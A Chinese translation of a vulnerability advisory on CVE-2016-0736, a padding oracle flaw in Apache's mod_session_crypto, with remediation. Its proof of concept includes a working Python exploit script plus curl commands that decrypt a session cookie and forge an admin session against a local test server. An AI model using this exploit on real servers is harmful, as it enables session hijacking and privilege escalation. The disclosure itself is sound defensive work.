前言
近日,安全研究人员在Web服务器Apache的mod_session_crypto模块中发现了一个Padding Oracle漏洞。攻击者可以利用这个漏洞来解密会话数据,甚至可以用来对指定的数据进行加密。
漏洞细节
产品:Apache HTTP Server mod_session_crypto
受影响的版本:2.3到2.5
已经修复的版本:2.4.25
漏洞类型:Padding Oracle
安全风险:高
供应商网址:https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
供应商状态:已经发布修复版
公告网址:https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
公告状态:已发布
CVE:CVE-2016-0736
CVE网址:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
引言
人们可以联合使用Apache HTTP服务器的mod_session_crypto模块、mod_session模块和mod_session_cookie模块,将会话数据存储到用户浏览器中的加密Cookie中。这样可以避免使用服务器端会话状态,从而便于将传入的HTTP请求分配到多个不需要共享会话状态的应用程序Web服务器上面。
更多细节
模块mod_session_crypto使用对称加密技术来加密和解密会话数据,并使用mod_session将加密后的数据存储到用户浏览器的Cookie(通常称为“会话”)中。之后,可以将解密的会话用于应用程序的环境变量或自定义的HTTP请求头部中。应用程序可以添加自定义的HTTP响应头部(通常是“X-Replace-Session”),通知HTTP服务器使用该头部的值替换该会话的内容。设置mod_session和mod_session_crypto的具体方法请参考下列文档:
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
模块mod_session_crypto被配置为使用3DES或AES加密算法(密钥大小视具体情况而定),默认为AES256。具体的加密工作是由函数“encrypt_string”完成的:
modules/session/mod_session_crypto.c
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
/** * Encrypt the string given as per the current config. * * Returns APR_SUCCESS if successful. */static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, session_crypto_dir_conf *dconf, const char *in, char **out){[...] apr_crypto_key_t *key = NULL;[...] const unsigned char *iv = NULL;[...] /* use a uuid as a salt value, and prepend it to our result */ apr_uuid_get(&salt);[...] res = apr_crypto_passphrase(&key, &ivSize, passphrase, strlen(passphrase), (unsigned char *) (&salt), sizeof(apr_uuid_t), *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);[...] res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);[...] res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, strlen(in), block);[...] res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);[...] /* prepend the salt and the iv to the result */ combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); memcpy(combined, &salt, sizeof(apr_uuid_t)); memcpy(combined + sizeof(apr_uuid_t), iv, ivSize); memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); /* base64 encode the result */ base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + sizeof(apr_uuid_t) + 1) * sizeof(char));[...] return res;} |
源代码显示加密密钥是根据配置的密码和随机选择的salt通过调用函数“apr_crypto_passphrase”生成的。这个函数在内部使用PBKDF2来生成钥匙。然后,对数据进行加密,并将salt和IV放到加密后的数据前面。在返回之前,该函数会对加密数据进行base64编码处理。
由于这个过程无法保证密文的完整性,所以Apache模块无法检测会话送回服务器之前是否已经被篡改了。这常常意味着攻击者能够利用Padding Oracle漏洞发动攻击,即对会话进行解密并加密指定的任意数据。
概念验证代码(POC)
下面我们来复现这个安全漏洞。首先,启用模块mod_session、mod_session_crypto和mod_session_cookie,并进行如下所示的配置:
|
1
2
3
4
5
|
Session OnSessionEnv OnSessionCookieName session path=/SessionHeader X-Replace-SessionSessionCryptoPassphrase RedTeam |
此外,为文件夹编写一个如下所示的CGI脚本,然后将该CGI脚本保存为“status.rb”,供客户端使用:
|
1
2
3
4
5
6
7
8
9
10
11
12
|
#!/usr/bin/env rubyrequire 'cgi'cgi = CGI.newdata = CGI.parse(ENV['HTTP_SESSION'])if data.has_key? 'username' puts puts "your username is %s" % data['username'] exitendputs "X-Replace-Session: username=guest×tamp=" + Time.now.strftime("%s")putsputs "not logged in" |
搞定这个CGI脚本后,我们就可以在命令行HTTP客户端中通过curl来访问它了:
|
1
2
3
4
5
6
7
8
9
10
11
12
|
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rbHTTP/1.1 200 OKDate: Tue, 19 Jan 2016 13:23:19 GMTServer: Apache/2.4.10 (Ubuntu)Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/Cache-Control: no-cacheSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/Transfer-Encoding: chunkedContent-Type: application/x-rubynot logged in |
该示例表明,返回了一个新的、名为“session”的加密cookie,并且响应正文中包含文本“not logged in”。
使用刚才返回的cookie再次调用上面的脚本,可以看到会话中的用户名为“guest”:
|
1
2
3
4
|
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \http://127.0.0.1:8080/cgi-bin/status.rbyour username is guest |
现在修改这个cookie,让它以“u =”结尾,而非"U =",然后发送修改后的cookie,由于尾部的填充物会导致该cookie失效,所以该会话就无法正确解密,也就无法传递给该CGI脚本了,所以,将再次返回文本“not logged in”:
|
1
2
3
4
|
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \http://127.0.0.1:8080/cgi-bin/status.rbnot logged in |
这证明确实存在Padding Oracle漏洞。这样的话,我们就可以在Python库[1] python-paddingoracle的帮助下,通过利用这个Padding Oracle漏洞来解密会话。
exploit.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
from paddingoracle import BadPaddingException, PaddingOraclefrom base64 import b64encode, b64decodeimport requestsclass PadBuster(PaddingOracle): def __init__(self, valid_cookie, **kwargs): super(PadBuster, self).__init__(**kwargs) self.wait = kwargs.get('wait', 2.0) self.valid_cookie = valid_cookie def oracle(self, data, **kwargs): v = b64encode(self.valid_cookie+data) response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb', cookies=dict(session=v), stream=False, timeout=5, verify=False) if 'username' in response.content: logging.debug('No padding exception raised on %r', v) return raise BadPaddingExceptionif __name__ == '__main__': import logging import sys if not sys.argv[2:]: print 'Usage: [encrypt|decrypt] <session value> <plaintext>' sys.exit(1) logging.basicConfig(level=logging.WARN) mode = sys.argv[1] session = b64decode(sys.argv[2]) padbuster = PadBuster(session) if mode == "decrypt": cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32]) print('Decrypted session:\n%r' % cookie) elif mode == "encrypt": key = session[0:16] plaintext = sys.argv[3] s = padbuster.encrypt(plaintext, block_size=16) data = b64encode(key+s[0:len(s)-16]) print('Encrypted session:\n%s' % data) else: print "invalid mode" sys.exit(1) |
然后,我们就可以通过此Python脚本来解密会话了:
|
1
2
3
4
5
6
7
|
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=Decrypted session:b'username=guest×tamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'real 6m43.088suser 0m15.464ssys 0m0.976s |
在这个示例应用程序中,会话数据包括用户名和时间戳。该Python脚本也可以用来对包含用户名"admin"的新会话进行加密:
|
1
2
3
4
5
6
7
8
|
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\RU= username=adminEncrypted session:sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXYreal3m38.002susers0m8.536ssys0m0.512s |
如果将这个新加密的会话发送到服务器,这次显示用户名就会变成“admin”:
|
1
2
3
|
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rbyour username is admin |
解决方法
使用其他方式来存储会话,例如使用mod_session_dbd保存到数据库中。
修复漏洞
更新到Apache HTTP版本2.4.25(参见参考文献[2])。
安全风险
使用mod_session_crypto模块的应用程序通常会把敏感的数据保存在在会话中,其安全性主要依赖于攻击者无法解密或修改该会话。如果存在Padding Oracle漏洞,那么攻击者能够利用它来破坏这种机制,并能够构造会话,放入攻击者指定的任意内容。根据应用程序本身的情况,有可能给它的安全性带来致命的打击。所以,这个一个高危漏洞。
参考文献
[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:http://seclists.org/fulldisclosure/2016/Dec/74
如果此文章侵权,请留言,我们进行删除。0day
文章评论